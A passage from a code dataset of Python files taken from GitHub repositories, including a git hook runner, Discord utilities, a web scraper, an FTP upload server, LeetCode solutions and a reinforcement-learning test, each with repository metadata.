hashes[-1]\n\t\tcallback(i.strip(), merge and not last, ref)\n\nif __name__ == \"__main__\":\n\tsys.path.append(\"/etc/git-hooks\")\n\tsys.path.append(\"/usr/share/git-hooks\")\n\tfrom config import config as myconfig\n\tfor line in sys.stdin.readlines():\n\t\t(old, new, ref) = line.split(' ')\n\t\tname = sys.argv[0].split('/')[1]\n\t\tif name == \"home\":\n\t\t\tname = \"post-receive\"\n\t\tfor i in myconfig.enabled_plugins[name]:\n\t\t\ts = \"%s.%s\" % (i, i)\n\t\t\tplugin = __import__(s)\n\t\t\tfor j in s.split(\".\")[1:]:\n\t\t\t\tplugin = getattr(plugin, j)\n\t\t\ttry:\n\t\t\t\trun_hook(plugin.callback, old, new, ref.strip())\n\t\t\texcept Exception as s:\n\t\t\t\t\tprint(\"Can't run plugin '%s' (%s)\" % (i, s))\n","repo_name":"frugalware/git-hooks","sub_path":"git-hooks.py","file_name":"git-hooks.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"7700209403","text":"import os\nimport re\n\nfrom utils import convert_discord_timestamp\n\n\ndef create_format_variables(message: dict, attachment: dict, index: int = 0) -> dict:\n variables = {\n \"filename\": os.path.splitext(attachment[\"filename\"])[0],\n \"ext\": os.path.splitext(attachment[\"filename\"])[1][1:],\n \"message_id\": message[\"id\"],\n \"id\": attachment[\"id\"],\n \"date\": convert_discord_timestamp(message[\"timestamp\"]),\n \"username\": message[\"author\"][\"username\"],\n \"user_id\": message[\"author\"][\"id\"],\n }\n return variables\n\n\ndef create_filepath(\n variables: dict,\n path: str,\n channel_format_template: str,\n dm_format_template: str,\n win_filenames: bool,\n restrict_filenames: bool,\n) -> str:\n format_template = (\n channel_format_template if \"server_id\" in variables else dm_format_template\n )\n components = []\n first = True\n while format_template:\n head, tail = os.path.split(format_template)\n if first:\n components.insert(\n 0,\n sanitize_filename(\n tail.format(**variables), win_filenames, restrict_filenames\n ),\n )\n first = False\n else:\n components.insert(\n 0,\n sanitize_foldername(\n tail.format(**variables), win_filenames, restrict_filenames\n ),\n )\n format_template = head\n components.insert(0, path)\n filepath = os.path.join(*components)\n return filepath\n\n\ndef sanitize_filename(string, windows_naming, restrict_filenames):\n 
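# replace path separators and strip control characters first; the flags\n    # below optionally enforce Windows-reserved and ASCII-only rules\n    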
string = re.sub(r\"[/]\", \"_\", string)\n string = re.sub(r\"[\\x00-\\x1f]\", \"\", string)\n if os.name == \"nt\" or windows_naming:\n string = re.sub(r\"[<>:\\\"/\\\\\\|\\?\\*]\", \"_\", string)\n if restrict_filenames:\n string = re.sub(r\"[^\\x21-\\x7f]\", \"_\", string)\n return string\n\n\ndef sanitize_foldername(string, windows_naming, restrict_filenames):\n string = sanitize_filename(string, windows_naming, restrict_filenames)\n # windows folder names can not end with spaces (\" \") or periods (\".\")\n if os.name == \"nt\" or windows_naming:\n string = string.strip(\" .\")\n return string\n","repo_name":"gageirwin-python-tools/Discord-Media-Downloader","sub_path":"discord_dl/filenaming.py","file_name":"filenaming.py","file_ext":"py","file_size_in_byte":2225,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"39440893987","text":"import os\nfrom os import path\nimport os.path\nimport sys\nfrom datetime import datetime\n\nprint(\"********************************************\")\nprint(\"************Bulk File Renaming**************\")\nprint(\"\\n\\n\\n\")\n\nCon=\"Y\"\nwhile Con.upper()==\"Y\":\n FPath=input(\"Folder Path: \")\n while not path.exists(str(FPath)):\n FPath=input(\"Folder Path: \")\n c=1\n for f1 in os.listdir(str(FPath)):\n print(str(c) + \" : \"+ str(FPath)+\"/\"+str(f1))\n Date=str(datetime.date(datetime.now()))\n Date=Date.replace(\"-\",\"\")\n Time=str(datetime.time(datetime.now()))\n Time=Time.replace(\":\",\"\")\n Time,E1,E2=Time.partition('.')\n Name,Dot,Format=f1.partition('.')\n Appending=\"_ENT_MCT_MCO_002_\"+Date+\"_\"+Time+\".\"+str(Format)\n os.rename(str(FPath)+\"/\"+str(f1),str(FPath)+\"/\"+str(Name)+Appending)\n c+=1\n Con=input(\"Do You Wish To Continue? (Y/N): \")\n\n\n\n","repo_name":"drahdari/Others","sub_path":"More Simple Scripts/Bulk_Templated_FileRename.py","file_name":"Bulk_Templated_FileRename.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74914974201","text":"import mimetypes\nimport random\nimport string\n\nfrom vial.compat import bstr\n\n_BOUNDARY_CHARS = string.digits + string.ascii_letters\n\n\ndef encode_multipart(fields, files, boundary=None):\n r\"\"\"Encode dict of form fields and dict of files as multipart/form-data.\n Return tuple of (body_string, headers_dict). Each value in files is a dict\n with required keys 'filename' and 'content', and optional 'mimetype' (if\n not specified, tries to guess mime type or uses 'application/octet-stream').\n\n >>> body, headers = encode_multipart({'FIELD': 'VALUE'},\n ... {'FILE': {'filename': 'F.TXT', 'content': 'CONTENT'}},\n ... 
boundary='BOUNDARY')\n >>> print('\\n'.join(repr(l) for l in body.split('\\r\\n')))\n '--BOUNDARY'\n 'Content-Disposition: form-data; name=\"FIELD\"'\n ''\n 'VALUE'\n '--BOUNDARY'\n 'Content-Disposition: form-data; name=\"FILE\"; filename=\"F.TXT\"'\n 'Content-Type: text/plain'\n ''\n 'CONTENT'\n '--BOUNDARY--'\n ''\n >>> print(sorted(headers.items()))\n [('Content-Length', '193'), ('Content-Type', 'multipart/form-data; boundary=BOUNDARY')]\n >>> len(body)\n 193\n \"\"\"\n def escape_quote(s):\n return bstr(s).replace(b'\"', b'\\\\\"')\n\n if boundary is None:\n boundary = ''.join(random.choice(_BOUNDARY_CHARS) for i in range(30)).encode('latin1')\n lines = []\n\n for name, value in fields:\n lines.extend((\n b'--%s' % boundary,\n b'Content-Disposition: form-data; name=\"%s\"' % escape_quote(name),\n b'',\n bstr(value, 'utf-8'),\n ))\n\n for name, value in files:\n filename = value['filename']\n if 'mimetype' in value:\n mimetype = value['mimetype']\n else:\n mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'\n lines.extend((\n b'--%s' % boundary,\n b'Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"' % (\n escape_quote(name), escape_quote(filename)),\n b'Content-Type: %s' % (bstr(mimetype)),\n b'',\n value['content'],\n ))\n\n lines.extend((\n b'--%s--' % boundary,\n b'',\n ))\n body = b'\\r\\n'.join(lines)\n\n headers = {\n b'Content-Type': b'multipart/form-data; boundary=%s' % boundary,\n b'Content-Length': bstr(str(len(body))),\n }\n\n return (body, headers)\n","repo_name":"baverman/vial-http","sub_path":"vial-plugin/vial_http/multipart.py","file_name":"multipart.py","file_ext":"py","file_size_in_byte":2452,"program_lang":"python","lang":"en","doc_type":"code","stars":412,"dataset":"github-code","pt":"40"} +{"seq_id":"43771866536","text":"import requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport xlsxwriter\n\nsirealNumber=[]\nmovieName=[]\nmovieYear=[]\nmovieGenre=[]\nmovieRating=[]\n\nURL=\"https://www.imdb.com/list/ls041322734/\"\nr = requests.get(URL)\nsoup = BeautifulSoup(r.content, 'html5lib')\n# print(soup.prettify())\n\ntable = soup.find('div', attrs = {'class':'lister list detail sub-list'})\n\nfor sno in table.findAll('span', attrs={'class':'lister-item-index unbold text-primary'}):\n sirealNumber.append(sno.text.strip(\".\"))\n # print(sno.text.strip(\".\"))\n\nfor mName in table.findAll('h3', attrs={'class':'lister-item-header'}):\n for movieNames in mName.findAll('a'):\n movieName.append(movieNames.text)\n\nfor years in table.findAll('span',attrs={'class':'lister-item-year text-muted unbold'}):\n movieYear.append(years.text.strip(\"()\"))\n\nfor genres in table.findAll('span', attrs={'class':'genre'}):\n movieGenre.append(genres.text)\n\nfor ratingsTab in table.findAll('div',attrs={'class':'ipl-rating-star small'}):\n for ratings in ratingsTab.findAll('span', attrs={'class':'ipl-rating-star__rating'}):\n movieRating.append(ratings.text)\n\n\n\ndat1 = pd.DataFrame(sirealNumber)\ndat1.columns = ['Serial Number']\nresult1A = dat1\n\ndat2 = pd.DataFrame(result1A)\ndat3 = pd.DataFrame(movieName)\ndat3.columns = ['Movie Name']\nresult2A = dat2.join(dat3)\n\ndat4 = pd.DataFrame(result2A)\ndat5 = pd.DataFrame(movieYear)\ndat5.columns = ['Movie Year']\nresult3A = dat4.join(dat5)\n\ndat6 = pd.DataFrame(result3A)\ndat7 = pd.DataFrame(movieGenre)\ndat7.columns = ['Movie Genre']\nresult4A = dat6.join(dat7)\n\ndat8 = pd.DataFrame(result4A)\ndat9 = pd.DataFrame(movieRating)\ndat9.columns = ['Movie Rating']\nresult4A = 
dat8.join(dat9)\n\n\ndf1 = pd.DataFrame(result4A)\nwriter = pd.ExcelWriter('result.xlsx', engine='xlsxwriter')\ndf1.to_excel(writer, sheet_name='Sheet1')\nworksheet = writer.sheets['Sheet1']\nwriter.save()","repo_name":"AvishekSahu24/BeautifulSoup_IMDB_Top_Movies_List_In_Excel_Output","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41698707746","text":"# https://leetcode.com/problems/maximum-subarray/\n\nclass Solution:\n def maxSubArray(self, nums) -> int:\n sum_max = nums[0]\n sum_cur = 0\n for i in range(len(nums)):\n sum_cur = nums[i] + sum_cur * int((sum_cur + nums[i]) > nums[i])\n if sum_cur > sum_max:\n sum_max = sum_cur\n return sum_max\n \ns = Solution()\nprint(s.maxSubArray([-2,1,-3,4,-1,2,1,-5,4]))\n\n ","repo_name":"dkuzyurin/leetcode","sub_path":"0053-maximum-subarray.py","file_name":"0053-maximum-subarray.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70974134199","text":"from unit import *\nfrom controllable import *\nfrom constant import *\nfrom cursor import *\n\n#\n# Enemy\n#\n# Any unit controlled by the enemy\n# All must be killed to win\n#\n\nclass Enemy (Unit):\n\n def __init__ (self,name):\n\n Unit.__init__(self,name)\n log(\"Enemy.__init__ for \"+str(self))\n \n Character.enemies.append(self)\n\n #Setup Switching\n self._next = Character.enemies[0]\n self._previous = Character.enemies[0] if len(Character.enemies) < 2 else Character.enemies[-2]\n self._next._previous = self\n self._previous._next = self\n\n def is_enemy (self):\n return True\n\n def move (self,dx,dy):\n return Unit.move(self,dx,dy)\n\n def end_turn (self):\n #Ending Turn\n self.set_unavailable()\n log(\"ended turn for \"+str(self))\n \n #If no units can move, end the Enemy's turn\n remaining = [enemy for enemy in Character.enemies if enemy.is_available()]\n if remaining == []:\n Controllable.player = True\n log(\"All enemies have ended turn. Switching to player turn.\")\n for friendly in Character.friendlies:\n friendly.set_available()\n unit = Character.friendlies[0]\n Controllable.current.switch(unit)\n Cursor.cursor.appear(unit.x(),unit.y())\n Cursor.cursor.reset_summons()\n Controllable.current.switch(Cursor.cursor)\n announce(self._screen._window,\"PLAYER TURN\")\n\n for enemy in Character.enemies:\n #This is necessary so that the Player can select the enemies on the Player's turn\n enemy.set_available()\n\n def die (self,killer):\n Unit.die(self,killer)\n Character.enemies.remove(self)\n\n #End The Game\n if Character.enemies == []:\n self.update_panel()\n log(\"All enemies have died. Player has won. 
Game will now end.\")\n win(self._screen._window)\n\n #End The Turn\n if self.is_current():\n self.end_turn()\n","repo_name":"Zhomans/spookyquest","sub_path":"enemy.py","file_name":"enemy.py","file_ext":"py","file_size_in_byte":2056,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"6303870595","text":"import csv\n\nstates = ['a', 'b', 'c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','1','2','3','4','5','6','7','8','9','0']\nn = 4\nfilename = 'listofwords.csv'\n\ndef increment(arr):\n last = n - 1\n cut_off = len(states) - 1\n\n arr[last] += 1\n\n for i in range(last, 0, -1):\n if arr[i] > cut_off:\n arr[i] = 0\n arr[i - 1] += 1\n else:\n break\n return arr\n\n\ndef permutations(states, n):\n if len(states) <= 1: return\n if n == 0: return\n\n current = [0] * n\n\n out = []\n count = 0\n\n possibilities = len(states) ** n\n\n while count < possibilities:\n new_permutation = []\n\n for i in range(0, n):\n j = current[i]\n new_permutation += [states[j]]\n out += [new_permutation]\n\n count += 1\n current = increment(current)\n\n return out\n\ndef write_file(filename,permutations):\n listFile = open(filename, 'w+')\n writer = csv.writer(listFile)\n\n for item in permutations:\n word = ''.join(item)\n writer.writerow([word])\n\nprint(permutations(states, n))\n\ndef main():\n words = permutations(states, n)\n write_file(filename,words)\n\n\nif __name__ == '__main__':\n main()","repo_name":"willsjacobsen/Random-String-Generator","sub_path":"generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30746652440","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\nimport os\nimport sys\n\nfrom threading import Thread\n\nsys.path.append('..')\nfrom bin.loggerPro import LoggerPro, logger\n\n'''\n@author: anke\n@contact: anke.wang@foxmail.com\n@file: cmdThread.py\n@time: 2020/4/25 11:25 AM\n\n@desc: 为任务创建线程\n'''\n\n\nclass CmdThread(Thread):\n def __init__(self, id, cmd):\n Thread.__init__(self)\n self.id = id\n self.cmd = cmd\n self.isSuccess = False\n\n def run(self):\n isComeon = True\n if isComeon:\n status = 0\n result = '假装我就是执行结果'\n # status, result = subprocess.getstatusoutput(self.cmd)\n if status == 0:\n logger.info('[****命令【%s】执行成功,退出进程!****]' % self.cmd)\n logger.info('[EXCUTE_DONE]%s' % self.cmd)\n logger.info('[****执行结果【%s】****]' % result)\n self.isSuccess = True\n else:\n logger.error('[****命令【%s】执行失败! 
status=【%d】 result=【%s】进程退出!****]'\n % (self.cmd, status, result))\n logger.error('[EXCUTE_DONE]%s' % self.cmd)\n\n\nif __name__ == '__main__':\n LoggerPro().config()\n cm = CmdThread(1, \"pwd\", )\n cm.run()\n","repo_name":"anke5156/hipDataLoad","sub_path":"bin/cmdThread.py","file_name":"cmdThread.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"103514751","text":"import sys\nsys.path.append(\"../..\")\nimport glob\nimport os.path\nimport smd.utils as utils\nimport numpy as np\n\nNOISE_PATH = \"/Users/quentin/Computer/DataSet/Music/speech_music_detection/esc-50/audio\"\nFILELISTS_PATH = \"/Users/quentin/Computer/DataSet/Music/speech_music_detection/esc-50/filelists\"\n\n\ndef load_files():\n noise_files = glob.glob(NOISE_PATH + \"/*.wav\")\n return noise_files\n\n\nif __name__ == \"__main__\":\n noise_files = load_files()\n\n print(\"Number of noise files: \" + str(len(noise_files)))\n\n for file in noise_files:\n utils.save_annotation([[\"noise\"]], os.path.basename(file).replace(\".wav\", \"\") + \".txt\", NOISE_PATH)\n\n noise_train = np.random.choice(noise_files, size=int(len(noise_files) * 0.8), replace=False)\n\n for file in noise_files:\n if file in noise_train:\n with open(os.path.join(FILELISTS_PATH, 'noise_train'), 'a') as f:\n f.write(os.path.basename(file) + '\\n')\n else:\n with open(os.path.join(FILELISTS_PATH, 'noise_val'), 'a') as f:\n f.write(os.path.basename(file) + '\\n')\n","repo_name":"qlemaire22/speech-music-detection","sub_path":"prepare_dataset/extract_annotations/esc-50.py","file_name":"esc-50.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","stars":85,"dataset":"github-code","pt":"40"} +{"seq_id":"21254032489","text":"\r\n# =============================================================================\r\n# Programm taking the retrieved row data and cleaning it in defined columns\r\n# =============================================================================\r\n\r\n# Used Libraries\r\n\r\nimport pandas as pd\r\nimport time\r\nimport os\r\n\r\n\r\n# Function that takes a Dataset as input and cleans it into defined columns\r\n\r\ndef DataCleaning(DataFile):\r\n \r\n # Holding count of number of errors\r\n \r\n Errors = 0\r\n \r\n \r\n # Creating an empty dataframe to input the cleaned data\r\n \r\n Labels = {'ID':[], 'Brand':[], 'Model':[], 'Price':[], 'Km':[], 'Engine':[], 'Age':[], 'Color':[], 'NIP':[], 'Date':[]}\r\n\r\n CleanData = pd.DataFrame(data = Labels)\r\n \r\n \r\n # Holding track of time\r\n \r\n ts1 = time.perf_counter()\r\n\r\n\r\n # Looping for every vehicule\r\n\r\n for i in range(len(DataFile)):\r\n \r\n \r\n # Holding track of time\r\n \r\n ts2 = time.perf_counter()\r\n \r\n \r\n # Progress information printed on the console\r\n \r\n if i % int(ChunkSize/10) == 0 and i != 0:\r\n \r\n print(f'{i}: {round(i/len(DataFile)*100)}% in {round(ts2-ts1,2)} seconds')\r\n \r\n if i == len(DataFile)-1:\r\n \r\n print(f'{i + 1}: 100% in {round(ts2-ts1,3)} seconds \\n')\r\n \r\n \r\n # Selecting the vehicule's id and sending it to the final Dataframe\r\n \r\n CleanData.loc[i, 'ID'] = str((DataFile.iloc[i, 0]))\r\n \r\n \r\n # Slicing the HTML title into separate words\r\n \r\n TempTitle = DataFile.iloc[i,1]\r\n \r\n TempTitle = TempTitle.split(' ')\r\n \r\n \r\n # try to fetch the price\r\n \r\n try:\r\n \r\n # Looking for keywords in the title\r\n \r\n for j in range(len(TempTitle)):\r\n \r\n # The 
keyword 'kaufen.' if our keyword. the model's name ended\r\n # 4 words prior.\r\n \r\n if TempTitle[j] == 'kaufen.':\r\n \r\n # For Model\r\n TempModel = TempTitle[:j-4]\r\n \r\n # The Value before 'Anfrage' no Price is available\r\n \r\n if TempTitle[j-1] == 'Anfrage':\r\n \r\n CleanData.loc[i, 'Price'] = None\r\n \r\n # else, the price is in position keyword-2, we directly\r\n # clean the Price of any unwanted symbols\r\n \r\n else:\r\n \r\n CleanData.loc[i, 'Price'] = int(TempTitle[j-2].replace(\"'\", \"\").replace(\".\", \"\").replace(\"-\", \"\"))\r\n \r\n # if an error was raised, set the price to None to avoid an error\r\n \r\n except: \r\n \r\n CleanData.loc[i, 'Price'] = None\r\n \r\n \r\n # Next we join the brand and model of the vehicule together\r\n \r\n try:\r\n \r\n CleanData.loc[i, 'Brand'] = TempModel[0]\r\n \r\n CleanData.loc[i, 'Model'] = '_'.join(TempModel[1:])\r\n \r\n # again accounting for missing data\r\n \r\n except:\r\n \r\n CleanData.loc[i, 'Brand'] = None\r\n \r\n CleanData.loc[i, 'Model'] = None\r\n \r\n \r\n # The Km usually comes retrieved at a specific place and can be taken\r\n # as is\r\n \r\n try:\r\n \r\n CleanData.loc[i, 'Km'] = DataFile.iloc[i, 4].replace(\"'\", \"\")\r\n \r\n except:\r\n \r\n CleanData.loc[i, 'Km'] = None\r\n \r\n \r\n # fetching the date of publication while accounting for a possible shift\r\n # in columns depending the the amount of values that we managed to retrieve\r\n \r\n try:\r\n \r\n if DataFile.iloc[i,6] != 'error':\r\n \r\n CleanData.loc[i, 'Date'] = DataFile.iloc[i,6]\r\n \r\n else:\r\n \r\n if len(DataFile.iloc[i,7]) == 10:\r\n \r\n CleanData.loc[i, 'Date'] = DataFile.iloc[i,7]\r\n \r\n # again accounting for missing data\r\n \r\n except:\r\n \r\n CleanData.loc[i, 'Date'] = None\r\n \r\n \r\n # Fetching the initial entry into service date, same as above\r\n \r\n try:\r\n \r\n if len(DataFile.iloc[i,5]) == 7:\r\n \r\n CleanData.loc[i, 'Age'] = DataFile.iloc[i,5]\r\n \r\n else:\r\n \r\n CleanData.loc[i, 'Age'] = CleanData.loc[i, 'Date'][3:]\r\n \r\n except:\r\n \r\n CleanData.loc[i, 'Age'] = None\r\n \r\n\r\n # Other usefull data such as the color and the engine specifics\r\n \r\n try:\r\n \r\n # taking the description and dividing it into words\r\n \r\n TempDescr = DataFile.iloc[i,2]\r\n \r\n TempDescr = TempDescr.split(' 101101\n# - 3 -> 11\n# - 2 -> 10\n\nimport math\n\ndef to_binary(num):\n binary = ''\n while num != 0:\n binary += str(num % 2)\n num = math.floor(num/2)\n return \"\".join(reversed(binary))\n\nnumber = int(input('Введите число: '))\nbin_number = to_binary(number)\nprint(bin_number)\n","repo_name":"MikeGoroshkov/python-hw3","sub_path":"task4.py","file_name":"task4.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72052987959","text":"from uteis import menuPrin\nfrom cadastros.cadcli import CadClientes\nfrom cadastros.cadpro import CadProdutos\nfrom cadastros.cadcont import CadContas\nfrom vendas.venda import Vendas\n\n\nwhile True:\n try:\n print('{:=^40}'.format(' MENU PRINCIPAL '))\n menuPrin()\n op = int(input('Selecione uma opção: '))\n except KeyboardInterrupt:\n continue\n except (ValueError, TypeError):\n print('Tipo de dado incorreto, por favor selecione uma opção do menu.')\n continue\n except Exception as erro:\n print(f'Ocorreu um erro ao selecionar a opção, por favor tente novamente.')\n continue\n if op == 1:\n cadcli = CadClientes()\n cadcli.cad_clientes()\n elif op == 2:\n cadpro = 
CadProdutos()\n cadpro.cad_produtos()\n elif op == 3:\n cadcont = CadContas()\n cadcont.cad_contas()\n elif op == 4:\n ven = Vendas()\n ven.venda()\n elif op == 5:\n break\n else:\n print('Opção inválida, por favor selecione uma opção do menu.')\n continue\n","repo_name":"edson-cpp/cadNX","sub_path":"menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"29483716267","text":"import discord\nfrom discord.ext import commands\nimport re\n\nclass purgestuff(commands.Cog):\n def __init__(self,bot):\n self.bot = bot\n\n @commands.group()\n @commands.has_permissions(manage_messages=True)\n async def purge(self,ctx):\n if ctx.invoked_subcommand is None:\n embed = discord.Embed(title=\"Purge Command Syntax\", description=\"\"\"\n **Description:** The purge command deletes a number of messages in a channel\n **Uses:**\n -__purge count (count)__ --Deletes the specified number of messages\n -__purge bots (count)__ --Deletes messages by bots\n -__purge humans (count)__ --Deletes messages by non-bots\n -__purge links (count)__ --Deletes messages with http:// or https://\n -__purge invites (count)__ --Deletes messages with invites\n -__purge user (@user) (count)__ --Deletes messages made by that user\n -__purge match (count) [match_phrase]__ --Deletes all messages with match_phrase in them\n \"\"\")\n return await ctx.send(embed=embed)\n\n @purge.command()\n async def count(self, ctx, count:int):\n num = await ctx.channel.purge(limit=count)\n return await ctx.send(f\"Purged {len(num)} messages\")\n\n @purge.command()\n async def bots(self, ctx, count:int):\n check = lambda m: m.author.bot\n return await ctx.channel.purge(limit=count, check=check)\n\n @purge.command()\n async def humans(self, ctx, count:int):\n check = lambda m: not m.author.bot\n return await ctx.channel.purge(limit=count, check=check)\n\n @purge.command()\n async def user(self, ctx, user:discord.User, count:int):\n check = lambda m: m.author == user\n return await ctx.channel.purge(limit=count, check=check)\n @purge.command()\n async def match(self, ctx, count:int, *, match_phrase:str):\n check = lambda m: match_phrase.lower() in m.content.lower()\n return await ctx.channel.purge(limit=count, check=check)\n\n @purge.command()\n async def links(self, ctx, count:int):\n check = lambda m: \"https://\" in m.content.lower() or \"http://\" in m.content.lower()\n return await ctx.channel.purge(limit=count, check=check)\n\n @purge.command()\n async def invites(self,ctx,count:int):\n DISCORD_INVITE = r'discord(?:\\.com|app\\.com|\\.gg)[\\/invite\\/]?(?:[a-zA-Z0-9\\-]{2,32})'\n def get_invites(message):\n regex = re.compile(DISCORD_INVITE)\n invites = regex.findall(message)\n return invites or []\n check = lambda m: True if len(get_invites(m.content)) != 0 else False\n await ctx.channel.purge(limit=count, check=check)\n\n\n\ndef setup(bot):\n bot.add_cog(purgestuff(bot))\n","repo_name":"rij1234/dpy-public-cogs","sub_path":"complex_purge.py","file_name":"complex_purge.py","file_ext":"py","file_size_in_byte":2701,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"14435073630","text":"'''\ntesting hysteretic_q learning on the penalty game.\n'''\n\nfrom matplotlib import pyplot as plt\nimport numpy as np\n\nfrom environments.env_penalty import Penalty\nfrom learning_algorithms.hysteretic_q_matrix import HystereticAgentMatrix\n\nepisodes = 1\nepochs = 300\nexp_rate = 
0.01\nexp_rate_decay = 0.999\n\ndef run_episode():\n env = Penalty()\n learning = HystereticAgentMatrix(environment=env, exploration_rate=exp_rate)\n\n for i in range(epochs):\n learning.step()\n\n reward_1, reward_2 = learning.get_rewards()\n\n \"\"\"\n plt.plot(reward_1)\n plt.show()\n \"\"\"\n rewards_1, rewards_2 = learning.get_averaged_rewards()\n rewards_1 = np.asarray(rewards_1)\n rewards_2 = np.asarray(rewards_2)\n\n \"\"\"\n plt.plot(rewards_1)\n plt.title(\"Penalty Game, K = -3\")\n plt.xlabel(\"steps\")\n plt.ylabel(\"average_reward\")\n plt.show()\n \"\"\"\n return rewards_1\n\nif __name__ == \"__main__\":\n overall = np.zeros(shape=(epochs - 1,))\n for episode in range(episodes):\n overall += run_episode()\n print(\"Episode \", episode)\n #exp_rate = exp_rate * exp_rate_decay\n #print(exp_rate)\n\n plt.plot(overall / episodes)\n plt.xlabel(\"Epochs\")\n plt.ylabel(\"Averaged Rewards (Averaged over all episodes)\")\n plt.show()\n\n","repo_name":"swj0418/Reinforcement_Learning_Framework","sub_path":"tests/test_hysteretic_q_penalty.py","file_name":"test_hysteretic_q_penalty.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11759758183","text":"#!/usr/bin/env python\n# _*_ coding: utf-8 _*_\n\n# import socketserver\n#\n# class my_tcp_handler(socketserver.BaseRequestHandler):\n# def setup(self):\n# pass # 连接之前做一些操作\n#\n# def handle(self):\n# # conn,addr = server.accept()\n# # self.request,self.client_address = server.accept()\n# # 所有客户端交互都在该方法中进行处理 server --> bind --> listen --> accept都已经封装过了,直接处理后续的操作\n# print(self.client_address)\n# while True:\n# self.data = self.request.recv(1024)\n# print(self.data.decode())\n# self.request.send(self.data.upper())\n#\n# def finish(self):\n# pass #连接之后做一些操作\n#\n#\n# server = socketserver.ThreadingTCPServer(('localhost',9999),my_tcp_handler)\n# server.serve_forever()\n\n# import os\n# import SocketServer\n#\n# class my_server(SocketServer.BaseRequestHandler):\n#\n# def handle(self):\n# base_path = r'W:\\iso'\n# conn = self.request\n# print('connected... 
for ',self.client_address)\n#\n# while True:\n# pre_data = conn.recv(1024)\n# cmd,file_name,file_size = pre_data.split(\"|\")\n# recv_size = 0\n# file_dir = os.path.join(base_path,file_name.decode())\n# f = open(file_dir,'wb')\n# Flag = True\n# while Flag:\n# if int(file_size.decode()) > recv_size:\n# data = conn.recv(1024)\n# recv_size+=len(data)\n# else:\n# recv_size = 0\n# Flag = False\n# continue\n# f.write(data)\n# print('upload successed.file',file_name)\n# f.close()\n#\n# server = SocketServer.ThreadingTCPServer(('localhost',9999),my_server)\n# server.serve_forever()\n\n\nimport os\nimport json\n\nimport socketserver\n\nclass my_ftp(socketserver.BaseRequestHandler):\n\n def put(self,*args):\n cmd_dic = args[0]\n filename = cmd_dic[\"filename\"]\n filesize = cmd_dic[\"filesize\"]\n f = open(filename + '.new','wb') if os.path.isfile(filename) else open(filename,'wb')\n\n self.request.send(b'200 ok')\n received_size = 0\n while received_size < filesize:\n data = self.request.recv(1024)\n f.write(data)\n received_size += len(data)\n else:\n print(\"file [%s] has uploaded ...\" % filename)\n\n def handle(self):\n while True:\n try:\n self.data = self.request.recv(1024).strip()\n print(\"client socket\",self.client_address)\n print(\"receive data format\",self.data)\n cmd_dic = json.loads(self.data.decode())\n action = cmd_dic['action']\n if hasattr(self,action):\n func = getattr(self,action)\n func(cmd_dic)\n except ConnectionRefusedError as e:\n print('err',e)\n break\n\nserver = socketserver.ThreadingTCPServer(('localhost',9999),my_ftp)\nserver.serve_forever()\n\n\n","repo_name":"wangchunxiang8090/exercise","sub_path":"test/log/ftp_server.py","file_name":"ftp_server.py","file_ext":"py","file_size_in_byte":3140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"14032455860","text":"'''\n\n 1554. 
Strings Differ by One Character\n \n'''\n\nclass SolutionRef:\n def differByOne(self, dict):\n n, m = len(dict), len(dict[0])\n hashes = [0] * n\n MOD = 10 ** 11 + 7\n \n for i in range(n):\n for j in range(m):\n char = dict[i][j]\n hashes[i] = 26 * hashes[i] + self.code(char)\n print(hashes)\n \n base = 1\n for j in range(m - 1, -1, -1):\n seen = set()\n for i in range(n):\n char = dict[i][j]\n newH = (hashes[i] - base * self.code(char))\n \n if newH in seen: return True \n seen.add(newH) \n \n base = 26 * base\n \n def code(self, char):\n return ord(char) - ord('a')\n \n \nclass Solution:\n def differByOne(self, dict):\n wordLen, charLen = len(dict), len(dict[0])\n hashes = [0] * wordLen\n \n for i in range(wordLen):\n for j in range(charLen):\n char = dict[i][j]\n hashes[i] = (26 * hashes[i]) + self.code(char)\n \n base = 1\n for j in range(charLen - 1, -1, -1):\n seen = set()\n \n for i in range(wordLen):\n char = dict[i][j]\n newH = hashes[i] - (base * self.code(char))\n \n if newH in seen: return True\n seen.add(newH)\n \n base *= 26\n \n return False\n \n def code(self, char):\n return ord(char) - ord('a')\n \n \n \n \ndef runSolution():\n solution = Solution()\n print(solution.differByOne(dict = [\"abcd\",\"acbd\", \"aacd\"]))\n print(solution.differByOne(dict = [\"ab\",\"cd\",\"yz\"]))\n print(solution.differByOne(dict = [\"abcd\",\"cccc\",\"abyd\",\"abab\"]))\n 